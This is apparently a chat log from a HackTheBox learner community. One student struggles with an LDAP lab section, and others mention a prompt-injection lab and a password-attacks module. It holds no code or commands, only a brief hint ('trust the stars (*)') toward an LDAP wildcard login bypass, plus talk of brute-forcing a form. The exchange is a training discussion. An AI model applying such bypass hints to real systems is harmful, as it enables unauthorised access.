#

hi

#

I need help

#

Attacking Common Applications module LDAP section

#

I can't ckrack the hash

grand veldt
#

can somebody help me with that i didnt have a knowledge about python and i wanted to find flag so plz

dusk holly
steel wave
#

Working on Direct Prompt Injection lab, trying to run LLMmap on Parrot OS - I am asked to install a punch of packages, which ultimately fails becuase the system ran out of space (such as torch)

dusk holly
#

I just started Password attacks module, i heard it is pretty hard module, got any advice i should consider? i would really appreciate it

dusk holly
silk lagoon
dusk holly
silk lagoon
coarse pine
#

HHHEEEEEELLLLLLLLPPPPPPPPPPP

sand valve
#

@coarse pine you okay ?psyduck

sand valve
coarse pine
sand valve
#

Oh , i thought you had some in real life urgency.

coarse pine
sand valve
#

Both are good.

coarse pine
#

if I didn't solve the lab it is real life urgency

#

so

#

HHHHHHHHEEEEEEEEEEEEEEEEEEELLLLLLLLLLLLLLLLLPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP

sand valve
#

Lol

#

Maybe also ask AI chad gbt waz

coarse pine
sand valve
coarse pine
#

we break up

coarse pine
#

but I can't crak it

#

I don't know why

fathom pendant
#

it also helps to provide context of the module and section name so others can, idk, actually help you

#

instead of you shouting into the channel for help. Learn how to help others be able to help you

sand valve
#

@coarse pine you gotta give full details about the question , from what module and section it is , what the question is and what the goal is.

coarse pine
fathom pendant
#

LDAP section lemme see if I can dredge that up in my notes

coarse pine
#

I got the data but I don't know how I should crack it

fathom pendant
#

yeah, you're overly complicating this

coarse pine
#

what do you mean

fathom pendant
#

literally the last paragraph of the section tells you what to do

#

unless I'm not looking at the same page

#

it's the → Attacking Common Applications → Attacking LDAP section yeah?

#

there's no hash needed

coarse pine
#

yes

#

whaatttt

#

can I DM

fathom pendant
#

no

coarse pine
#

please

fathom pendant
#

it doesn't get more straightforward than, the section EXPLICITLY tells you what to do

coarse pine
#

not fair

#

I got hashes

#

hashes

fathom pendant
#

you didn't need 'em

coarse pine
#

so why they put them

fathom pendant
#

you massively overcomplicated the problem

coarse pine
#

doesn't make

fathom pendant
#

IGNORE THE HASHES

coarse pine
#

I quite learnning

fathom pendant
#

you say that every time

sand valve
#

Haha

fathom pendant
#

i'm tempted to just ignore you with how often you come in misunderstanding what the module is teaching then complain and say you quit learning

sand valve
#

Try try but don't cry.

fathom pendant
#

you need to get over hitting a wall and getting stuck and acting like it's the end of the world

#

You won't always have someone willing to tell you where you went wrong, or even put up with you spamming until you get a response

#

If what you're attempting doesn't work in a section, always first re-read the content to make sure you didn't overlook something

coarse pine
#

well I did not hear something calles LDAP before

fathom pendant
#

LDAP is the tech behind AD

coarse pine
fathom pendant
#

Lightweight Directory Access Protocol

#

it's what Bloodhound uses when doing it's queries to find relationships

fathom pendant
#

Instead of saying "I've never heard of LDAP before," instead try at least bare minimum research

coarse pine
#

they should teach us what is it first

fathom pendant
#

LDAP (Lightweight Directory Access Protocol) is a protocol used to access and manage directory information. A directory is a hierarchical data store that contains information about network resources such as users, groups, computers, printers, and other devices. LDAP provides some excellent functionality
First paragraph i fear

#

Modules above tier 0 and especially tier 2 and higher expect you to know the basics of things. LDAP is considered a basic thing when dealing with Windows and AD

#

like legit you make me question if you even read the content of the section before coming in here. And i'll likely start asking you if you actually read it before answering your cries for help

#

Tier 1 and above modules would be exponentially larger if they had to re-explain core concepts before teaching you how to attack them

sand valve
#

Btw you are only 1-2 steps behind solving it. @coarse pine

sand valve
#

You don't need to crack the hash @coarse pine

fathom pendant
#

actually, reading my notes on this section, it explains pretty well what LDAP is

#

and how it operates

coarse pine
#

am just a girl 💕

fathom pendant
fathom pendant
sand valve
#

This HTB episode is pure gold 🤣

fathom pendant
#

reread the last paragraph for the very explicit instructions on what you need to do to bypass the login

#

it's even referenced in the reading of how it works that way

sand valve
fathom pendant
#

like, all the complaints literally are addressed IN THE READING

harsh gorge
fathom pendant
#

I reread the notes and nothing that you have to do requires anything more complex than what's explicitly told. And even then, it's straightforward what the question is.

fathom pendant
# harsh gorge It is

i mean, in some cases sure, but is it really a valid excuse for not actually reading the page you're complaining about?

sand valve
#

@coarse pine i know you can do it .

harsh gorge
#

Just scrolled up. I was being funny but looks like they didn’t even read anything regarding it

coarse pine
#

it did not work so I brute force the submit place and it worked

#

thank you for nothing

fathom pendant
coarse pine
#

why not

fathom pendant
#

because the way forward was simpler than you think

sand valve
#

Yes

fathom pendant
#

trust the stars (*)

coarse pine
#

I just looked for some services and brute force it and got the right service

#

work smarter not harder

fathom pendant
coarse pine
fathom pendant
#

there's literally very little effort required to getting the answer

fathom pendant
#

ya really didn't